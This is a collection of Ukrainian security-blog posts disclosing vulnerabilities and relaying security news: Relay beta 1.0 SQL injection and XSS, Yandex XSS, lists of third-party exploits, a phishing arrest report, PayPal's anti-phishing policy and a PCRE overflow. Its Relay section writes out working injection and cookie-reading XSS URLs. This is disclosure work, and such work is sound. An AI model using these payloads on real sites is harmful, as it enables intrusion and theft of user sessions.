Websecurity - Веб безпека

В січні я вже писав про уразливості в Relay. І сьогодні я розробив експлоіт для SQL Injection уразливості в Relay.

Експлоіт: relay_exploit.txt.

Також сьогодні я знайшов нові SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

SQL Injection:

http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=1%20and%20substring(version(),1,1)=3&email=1

XSS:

http://site/relay/relay.php?relay=getFile&fileid=1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20relay_users/*%3Cscript%3Ealert(document.cookie)%3C/script%3E

Це XSS через SQL Injection - для гурманів .

XSS:

http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=and%3Cscript%3Ealert(document.cookie)%3C/script%3E&email=1

Ще одна XSS через SQL Injection .

XSS (Persistent):

http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=1&email=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.

Продовжуючи розпочату традицію, після попереднього відео про SQL Injection в JSP, пропоную новий відео секюріті мануал. Цього разу відео про Cross-Site Scripting атаки через Flash. Рекомендую подивитися всім хто цікавиться цією темою.

Multiple Websites Embedded SWF File Vulnerability Demonstration

В даному відео ролику розповідається про проведення Cross-Site Scripting атаки на через флешки на прикладі MySpace (причому в відео демонструється атака для розповсюдження віруса серед користувачів MySpace). Акаунт користувача даної соціальної мережі був вразливий до persistent XSS (дана уразливість вже виправлена). Рекомендую подивитися дане відео для розуміння векторів атаки за допомогою persistent XSS та небезпеки подібних уразливостей.

Про persistent XSS атаки через флеш я вже розповідав, коли писав про XSS уразливість в IPB.

Управління Служби безпеки України у Вінницькій області затримало 20-літнього студента, що за допомогою Інтернету крав гроші з кредитних карток приватних осіб. Про це повідомила прес-група УСБУ у Вінницькій області.

Відповідно до повідомлення, 20-літній студент одного з місцевих вищих навчальних закладів створив механізм викрадення особистих коштів громадян з їхніх карткових рахунків у банківських установах. Для цього восени минулого року він розмістив у мережі Інтернет фіктивне оголошення щодо працевлаштування за рубежем у неіснуючій компанії США. Бажаючі повинні були послати резюме у вигляді заповненої анкети, у якій серед іншого вказати реквізити платіжної картки. Одержавши необхідний дані, студент зайшов на сайт магазина мобільного зв’язку і після декількох невдалих спроб, несанкціоновано, без відома банківської установи і власника картки, втрутився в роботу автоматизованих систем, що мають відношення до обслуговування карткових рахунків. Студент кілька разів зняв з картки кошти.

По даному факту СБУ порушила кримінальну справу по ознаках злочинів, передбачених ч.2 ст.361 (несанкціоноване втручання в роботу комп’ютерних мереж, що привело до втрати і підробки інформації) і ч.1 ст.185 (крадіжка) Кримінального кодексу України.

По матеріалам http://ain.com.ua.

В даному випадку студент займався фішингом (для отримання реквізитів платіжних карток). Як я вже казав, сьогодні фішинг є дуже актуальною темою. До речі, 185 стаття тут недоречна, бо це не крадіжка, а шахрайство (стаття 190). Але в будь-якому разі фішера впіймали, тому не варто займатися подібною справою.

В даній добірці уразливості в веб додатках:

• Multiple Denial of Service attacks possible for Webspeed OpenEdge (деталі)
• eFileCabinet Authentication Bypass (деталі)
• fotolog xss (деталі)
• W1L3D4 Philboard v0.2 sql injection (деталі)
• phpMUR Cross Site Scripting (деталі)
• squirrelmail CSRF vulnerability (деталі)
• ImI image file inclusion in script upload (деталі)
• ifdate 2.* unauthorized administrative access bug (деталі)
• Jetbox CMS version 2.1 E-Mail Injection Vulnerability (деталі)
• PHP-інклюдинг в VisoHotlink (деталі)

Цікаву заяву нещодавно зробила Paypal. В контексті боротьби з загрозою фішинга, про яку я розповідав в своєму виступі в телепередачі на 1+1 і особливо в виступі на Інтері.

Представники Paypal говорять, що дозволяти своїм клієнтам робити фінансові операції через небезпечні браузери “те ж саме, що продавати автомобілі без ременів безпеки”. Ця система інтернет-платежів збирається заборонити користувачам робити платежі через браузери, не оснащені захистом від фішинга.

За словами начальника служби інформаційної безпеки Paypal, Майкла Баррета, це буде зроблено, щоб не допустити крадіжку особистих даних користувачів і запобігти спробам шахрайства.

Варто відзначити, що хоча Баррет не називав браузер Apple Safari, відомо, що в ньому немає ні захисту від фішинга, ні підтримки сертифікатів EV SSL. Розробники Firefox і Opera оголосили, що в нові версії їхніх браузерів буде вбудована підтримка EV SSL.

По матеріалам http://www.secblog.info.

P.S.

Стимулювання користувачів бути більш обережними в Мережі й протидіяти фішерським атакам, це звичайно добре. Але Paypal забула про те, що окрім вбудованих в браузери існують ще й інші антифішинг додатки (як у вигляді плагінів чи тулбарів, так і окремі додатки). Наявність котрих їм виявити буде дуже не просто, тому користувачі даних додатків виявляться обділеними, бо не зможуть повноцінно користуватися системою. А також варто пам’ятати, що антифішинг захист в браузері може бути відключеним (що також буде проблематично виявити).

17.01.2008

У червні, 17.06.2007, я знайшов Cross-Site Scripting уразливості в пошуковій системі Яндекс - на сайтах http://yandex.ru, http://images.yandex.ru та http://market.yandex.ru. Про що найближчим часом сповіщу адміністрацію пошуковця.

Детальна інформація про уразливості з’явиться пізніше.

02.05.2008

XSS:

http://yandex.ru (при кліку на “расширенный поиск”)

• alert(document.cookie)

http://images.yandex.ru (при кліку на “расширенный поиск”)

• alert(document.cookie)

http://market.yandex.ru

• alert(document.cookie)

Дані уразливості вже виправлені, але ще одна так і не була виправлена.

XSS:

http://market.yandex.ru (при кліку на “Вход”)

• alert(document.cookie)

В даній добірці експлоіти в веб додатках:

• Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability (деталі)
• Mambo Component AkoGallery 2.5b SQL Injection Vulnerability (деталі)
• Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability (деталі)
• All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability (деталі)
• RMSOFT Gallery System 2.0 (images.php id) SQL Injection Vulnerability (деталі)
• Mihalism Multi Host Download (Username) Blind SQL Injection Exploit (деталі)
• Astanda Directory Project 1.2 (link_id) SQL Injection Vulnerability (деталі)
• MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (деталі)
• OpenSiteAdmin <= 0.9.1.1 Multiple File Inclusion Vulnerabilities (деталі)
• PHPHtmlLib <= Remote File Include Exploit (деталі)

15.02.2008

Виявлене переповнення буфера в PCRE. Уразливість дозволяє віддаленому користувачу викликати відмову в обслуговуванні і скомпрометувати цільову систему.

Уразливі версії: PCRE версії до 7.6.

Уразливість існує через помилку перевірки границь даних при обробці класів символів. Зловмисник може за допомогою занадто довгого класу символів, з кодом більш 255, викликати переповнення буфера і виконати довільний код на цільовій системі.

Бібліотека Perl Compatible Regular Expressions (PCRE) широко використовується в різних програмних продуктах, тому дана уразливість може торкнутися багатьох продуктів. Всім користувачам даної бібліотеки потрібно оновити її на останню версію.

• Переполнение буфера в PCRE (деталі)

01.05.2008

Додаткова інформація.

• Apple Safari WebKit PCRE Handling Integer Overflow Vulnerability (деталі)
• Python: PCRE Integer overflow (деталі)
• New pcre3 packages fix arbitrary code execution (деталі)

В даній добірці уразливості в веб додатках:

• MyNewsGroups >> RFI in include.php (деталі)
• Progress Webspeed exploit for all releases (деталі)
• CA CleverPath SQL Injection (деталі)
• dcp-portal v611 >> RFi (деталі)
• Plogger - Session fixation Issue (деталі)
• Ahhp(php)-Portal Remote File Inclusion (деталі)
• AP Newspower software <=4.0.1 allows remote data manipulation (деталі)
• MoinMoin vulnerabilities (деталі)
• Teamspeak Server 2.0.20.1 Vulnerabilities (деталі)
• PHP-інклюдинг в Upload-service (деталі)